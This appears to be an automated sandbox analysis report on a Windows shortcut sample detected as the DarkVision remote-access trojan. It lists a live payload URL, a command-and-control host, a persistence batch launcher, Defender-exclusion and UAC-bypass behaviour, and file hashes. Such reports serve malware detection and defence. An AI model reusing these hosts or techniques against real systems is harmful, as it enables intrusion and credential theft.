                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\explorer.exeCode function: 12_2_02CFFA9D SleepEx,CloseHandle,GetVersion,DeviceIoControl,12_2_02CFFA9D

                            Stealing of Sensitive Information

                            barindex
                            Yara detected DarkVision Rat
                            Source: Yara matchFile source: 7.2.windows.exe.7ff7edb80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.0.windows.exe.7ff7edb80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.file.exe.7ff7fe2c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.0.windows.exe.7ff7edb80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.windows.exe.7ff7edb80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.explorer.exe.29c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.0.file.exe.7ff7fe2c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000007.00000002.2778094062.00007FF7EDBBA000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.1607358657.00000000045D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.1604613620.00007FF7FE2C1000.00000080.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.1637500701.00007FF7FE2FA000.00000080.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000003.1669864142.0000000004927000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000000.1801050989.00007FF7EDB81000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000000.1613068300.00007FF7EDB81000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000003.1652189758.000000000492A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.1611903304.00000000045D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000003.1650179614.000000000492B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000002.1829539061.00007FF7EDBBA000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: file.exe PID: 5620, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: windows.exe PID: 5628, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7428, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: windows.exe PID: 7872, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\file.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\windows\windows.exe, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Yara detected DarkVision Rat
                            Source: Yara matchFile source: 7.2.windows.exe.7ff7edb80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.0.windows.exe.7ff7edb80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.file.exe.7ff7fe2c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.0.windows.exe.7ff7edb80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.windows.exe.7ff7edb80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.explorer.exe.29c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.0.file.exe.7ff7fe2c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000007.00000002.2778094062.00007FF7EDBBA000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.1607358657.00000000045D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.1604613620.00007FF7FE2C1000.00000080.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.1637500701.00007FF7FE2FA000.00000080.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000003.1669864142.0000000004927000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000000.1801050989.00007FF7EDB81000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000000.1613068300.00007FF7EDB81000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000003.1652189758.000000000492A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.1611903304.00000000045D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000003.1650179614.000000000492B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000002.1829539061.00007FF7EDBBA000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: file.exe PID: 5620, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: windows.exe PID: 5628, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7428, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: windows.exe PID: 7872, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\file.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\windows\windows.exe, type: DROPPED

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting                            		Valid Accounts12
                            Command and Scripting Interpreter                            		1
                            Scripting                            		1
                            Abuse Elevation Control Mechanism                            		1
                            Disable or Modify Tools                            		OS Credential Dumping2
                            File and Directory Discovery                            		Remote Services1
                            Archive Collected Data                            		12
                            Ingress Tool Transfer                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts2
                            PowerShell                            		1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory112
                            System Information Discovery                            		Remote Desktop ProtocolData from Removable Media1
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAt2
                            Registry Run Keys / Startup Folder                            		211
                            Process Injection                            		1
                            Abuse Elevation Control Mechanism                            		Security Account Manager221
                            Security Software Discovery                            		SMB/Windows Admin SharesData from Network Shared Drive1
                            Non-Standard Port                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                            Registry Run Keys / Startup Folder                            		2
                            Obfuscated Files or Information                            		NTDS11
                            Process Discovery                            		Distributed Component Object ModelInput Capture2
                            Non-Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            Software Packing                            		LSA Secrets41
                            Virtualization/Sandbox Evasion                            		SSHKeylogging122
                            Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            DLL Side-Loading                            		Cached Domain Credentials1
                            Application Window Discovery                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                            Masquerading                            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                            Modify Registry                            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt41
                            Virtualization/Sandbox Evasion                            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron211
                            Process Injection                            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582686 Sample: 009274965.lnk Startdate: 31/12/2024 Architecture: WINDOWS Score: 100 53 acuweld.ddns.net 2->53 77 Suricata IDS alerts for network traffic 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 Antivirus detection for URL or domain 2->81 85 12 other signatures 2->85 10 powershell.exe 14 20 2->10         started        15 cmd.exe 1 2->15         started        signatures3 83 Uses dynamic DNS services 53->83 process4 dnsIp5 57 87.120.113.91, 49708, 80 UNACS-AS-BG8000BurgasBG Bulgaria 10->57 51 C:\Users\user\AppData\Local\Temp\file.exe, PE32+ 10->51 dropped 99 Powershell drops PE file 10->99 17 file.exe 3 3 10->17         started        21 conhost.exe 1 10->21         started        101 Windows shortcut file (LNK) starts blacklisted processes 15->101 23 cmd.exe 1 15->23         started        25 conhost.exe 1 15->25         started        file6 signatures7 process8 file9 49 C:\ProgramData\windows\windows.exe, PE32+ 17->49 dropped 59 Windows shortcut file (LNK) starts blacklisted processes 17->59 61 Multi AV Scanner detection for dropped file 17->61 63 Detected unpacking (changes PE section rights) 17->63 65 4 other signatures 17->65 27 windows.exe 3 17->27         started        30 cmd.exe 1 17->30         started        32 windows.exe 23->32         started        signatures10 process11 signatures12 87 Windows shortcut file (LNK) starts blacklisted processes 27->87 89 Multi AV Scanner detection for dropped file 27->89 91 Detected unpacking (changes PE section rights) 27->91 97 3 other signatures 27->97 34 cmd.exe 1 27->34         started        37 explorer.exe 4 27->37         started        93 Adds a directory exclusion to Windows Defender 30->93 40 powershell.exe 23 30->40         started        42 conhost.exe 30->42         started        95 Found direct / indirect Syscall (likely to bypass EDR) 32->95 process13 dnsIp14 67 Windows shortcut file (LNK) starts blacklisted processes 34->67 69 Adds a directory exclusion to Windows Defender 34->69 44 powershell.exe 22 34->44         started        47 conhost.exe 34->47         started        55 acuweld.ddns.net 87.121.86.214, 3440, 49712, 49713 SKATTV-ASBG Bulgaria 37->55 71 System process connects to network (likely due to code injection or exploit) 37->71 73 Tries to evade debugger and weak emulator (self modifying code) 37->73 75 Loading BitLocker PowerShell Module 40->75 signatures15 process16 signatures17 103 Loading BitLocker PowerShell Module 44->103

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            009274965.lnk29%ReversingLabsWin32.Trojan.WinLnk
                            009274965.lnk100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\file.exe100%Joe Sandbox ML
                            C:\ProgramData\windows\windows.exe100%Joe Sandbox ML
                            C:\ProgramData\windows\windows.exe74%ReversingLabsWin64.Trojan.Generic
                            C:\Users\user\AppData\Local\Temp\file.exe74%ReversingLabsWin64.Trojan.Generic

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            http://87.120.113.910%Avira URL Cloudsafe
                            http://87.120.113.91/image.exe100%Avira URL Cloudmalware

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            acuweld.ddns.net
                            		87.121.86.214
                            		truetrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://87.120.113.91/image.exetrue
                              • Avira URL Cloud: malware
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1645103934.000002AD6B011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1645103934.000002AD6B154000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://crl.mpowershell.exe, 00000000.00000002.1648729326.000002AD73328000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1608375832.000002AD5B1D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1608375832.000002AD5B1D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://go.micropowershell.exe, 00000000.00000002.1608375832.000002AD5C10D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://87.120.113.91powershell.exe, 00000000.00000002.1608375832.000002AD5C10D000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://contoso.com/powershell.exe, 00000000.00000002.1645103934.000002AD6B154000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1645103934.000002AD6B011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1645103934.000002AD6B154000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Licensepowershell.exe, 00000000.00000002.1645103934.000002AD6B154000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Iconpowershell.exe, 00000000.00000002.1645103934.000002AD6B154000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://aka.ms/pscore68powershell.exe, 00000000.00000002.1608375832.000002AD5AFA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1608375832.000002AD5AFA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1608375832.000002AD5B1D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      87.120.113.91
                                                      		unknownBulgaria
                                                      		25206UNACS-AS-BG8000BurgasBGtrue
                                                      87.121.86.214
                                                      		acuweld.ddns.netBulgaria
                                                      		34577SKATTV-ASBGtrue

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1582686
                                                      Start date and time:2024-12-31 09:27:11 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 7m 33s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:22
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:009274965.lnk
                                                      Detection:MAL
                                                      Classification:mal100.troj.expl.evad.winLNK@24/17@2/2
                                                      EGA Information:
                                                      • Successful, ratio: 25%
                                                      HCA Information:Failed
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .lnk

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                      • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target file.exe, PID 5620 because there are no executed function
                                                      • Execution Graph export aborted for target powershell.exe, PID 3920 because it is empty
                                                      • Execution Graph export aborted for target windows.exe, PID 5628 because there are no executed function
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: 009274965.lnk

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      03:28:22API Interceptor82x Sleep call for process: powershell.exe modified
                                                      03:29:00API Interceptor2674055x Sleep call for process: windows.exe modified
                                                      03:29:07API Interceptor1896811x Sleep call for process: explorer.exe modified
                                                      09:28:40AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{5CAAC06D-2278-4820-8E02-FD7BF03ADE5D}.lnk

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      87.120.113.91LPO-0048532025.lnkGet hashmaliciousDarkVision RatBrowse
                                                      • 87.120.113.91/image.exe
                                                      87.121.86.214LPO-0048532025.lnkGet hashmaliciousDarkVision RatBrowse

                                                        Domains

                                                        No context

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        UNACS-AS-BG8000BurgasBGhoEtvOOrYH.exeGet hashmaliciousSmokeLoaderBrowse
                                                        • 87.120.115.216
                                                        rebirth.arm4t.elfGet hashmaliciousGafgytBrowse
                                                        • 87.120.113.63
                                                        rebirth.spc.elfGet hashmaliciousGafgytBrowse
                                                        • 87.120.113.63
                                                        rebirth.sh4.elfGet hashmaliciousGafgytBrowse
                                                        • 87.120.113.63
                                                        rebirth.arm5.elfGet hashmaliciousGafgytBrowse
                                                        • 87.120.113.63
                                                        rebirth.x86.elfGet hashmaliciousGafgytBrowse
                                                        • 87.120.113.63
                                                        rebirth.ppc.elfGet hashmaliciousGafgytBrowse
                                                        • 87.120.113.63
                                                        rebirth.arm6.elfGet hashmaliciousGafgytBrowse
                                                        • 87.120.113.63
                                                        rebirth.m68.elfGet hashmaliciousGafgytBrowse
                                                        • 87.120.113.63
                                                        rebirth.mpsl.elfGet hashmaliciousGafgytBrowse
                                                        • 87.120.113.63
                                                        SKATTV-ASBGLPO-0048532025.lnkGet hashmaliciousDarkVision RatBrowse
                                                        • 87.121.86.214
                                                        arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                        • 87.120.187.226
                                                        Pago.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                                        • 87.121.86.205
                                                        yIla7SeJ6r.docGet hashmaliciousXenoRATBrowse
                                                        • 87.121.86.205
                                                        Outstanding_Payment.vbsGet hashmaliciousUnknownBrowse
                                                        • 87.121.86.205
                                                        Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                        • 87.121.86.105
                                                        RHxJqGoGFB.exeGet hashmaliciousSalityBrowse
                                                        • 94.156.127.59
                                                        yVVZdG2NJX.exeGet hashmaliciousGuLoaderBrowse
                                                        • 87.121.86.8
                                                        https://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqgm=uhfvxoo&uynyplq=iryzkatx&qfzs=stmleud&vkbxzkf=hxgbjzit&dnro=vjxntck&kfrldgj=vpyfihbn&nsko=sdzidzb&unudtuz=mnvrwokv&lisf=zxdfari&tdyzrah=otrtzuun&rfza=trokalr&vkfduyc=wpwvnxpe&jjsq=pgkbofh&uatnbjp=gtwiypfq&zilu=kagobvs&jqfufkw=bckrzetp&tjng=jgmmmod&fvdtpsk=vlyzfjep&mgoi=fklhysh&llyljdv=jxpogtdn&gcjv=vjlzkuf&erlhvti=peuprtov&kbxk=jviffkg&lklbxhl=uhzpnzfw&upaw=gfmiehp&ismxijp=hmwbsmgj&zdkc=kodikna&njllvzf=oodglyrw&urdk=cktezyn&vmqhwgh=kqcbhffu&riqy=tlnbqzr&nmlgrkn=inyeynzg&vebu=pwpghzr&ckpmyoc=tmeufjen&otic=svrqsdo&tbwzubGet hashmaliciousUnknownBrowse
                                                        • 87.121.86.72
                                                        http://cl4ycra.hgzcbqsqumhkfshql.com/kxosbfkveGet hashmaliciousUnknownBrowse
                                                        • 87.121.86.72

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\ProgramData\windows\windows.exe

                                                        Download File
                                                        Process:C:\Users\user\AppData\Local\Temp\file.exe
                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):4220416
                                                        Entropy (8bit):5.916038660889432
                                                        Encrypted:false
                                                        SSDEEP:49152:iKJMALBVPTgl5g0jDRAu2tFtxZCDo8MvOgXmZk8b:bgrjDRApJjCbHZk
                                                        MD5:D37285BF0331C7514E5E4CEC0FBE647C
                                                        SHA1:2A83F532B50FB5ACD4F417C2CE51A1EAC1BB9C08
                                                        SHA-256:F96C269716F360AA2FBB1926DDA79C3FF47EA7D8EC6615CDE06B205D28400F79
                                                        SHA-512:D1A9F56A504BC6D13A0AF3AC1CAF97D9BC86ACE60577B87A2F7143C3C94ADE29605559B9122C19D2A8CA2F817D6EFE123A24C75012B9C22241FBCDF2938B1D81
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: C:\ProgramData\windows\windows.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\ProgramData\windows\windows.exe, Author: Joe Security
                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\ProgramData\windows\windows.exe, Author: ditekSHen
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 74%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ a.[A..[A..[A..47.._A..@..QA..R9..XA..R9..ZA..R9..RA..[A..%A..@...A..@..2A..@..ZA..@..ZA..Rich[A..........PE..d...M.6g.........."......|...........`@........@..............................@.....CbA...@................................................................. p@.@................................................................................................... . .p.......p..................@....rsrc...............................@....idata ............................@...ikkqoqkj..8.......8.................@...bywcbldd.....`@......F@.............@....pdata.I. ...p@......H@.............@..@................................................................................................................................................................................................................................................................

                                                        C:\ProgramData\{43FE0128-8195-4F1C-ADAF-97085D2B6441}\{323467A8-45DA-47D5-AF53-60BD8A3D7BCB}.bat

                                                        Download File
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:DOS batch file, ASCII text
                                                        Category:dropped
                                                        Size (bytes):101
                                                        Entropy (8bit):5.161433978523328
                                                        Encrypted:false
                                                        SSDEEP:3:mKDDRc29mbZkRE/KX3meRie77+gZn7gdXgeP:htJEirpRlq2nUR
                                                        MD5:D58791BE7BA08E8102366B2626C2C1EC
                                                        SHA1:6B4D80343E46CC26EB1D49B14DCEE0503DED63F3
                                                        SHA-256:E728D84F1FB2B1BB8A4D585E7211691ADCAC6FAEF0AD63A15F8F96FF968C0FA6
                                                        SHA-512:6FFBDBB971C3BEB41D3DCCB198FCAFBF9F8D16689B348885949F55F21CACD70F7597F6FD9155774984C01BE8FD0DA86143F26B9A10FA91A5470B1B5FB19B7AC0
                                                        Malicious:false
                                                        Preview:@echo off.cmd /c start "" "C:\ProgramData\windows\windows.exe" {E18E5DB7-AE08-4C9E-ABE2-E82E89BF186D}

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:modified
                                                        Size (bytes):64
                                                        Entropy (8bit):0.34726597513537405
                                                        Encrypted:false
                                                        SSDEEP:3:Nlll:Nll
                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                        Malicious:false
                                                        Preview:@...e...........................................................

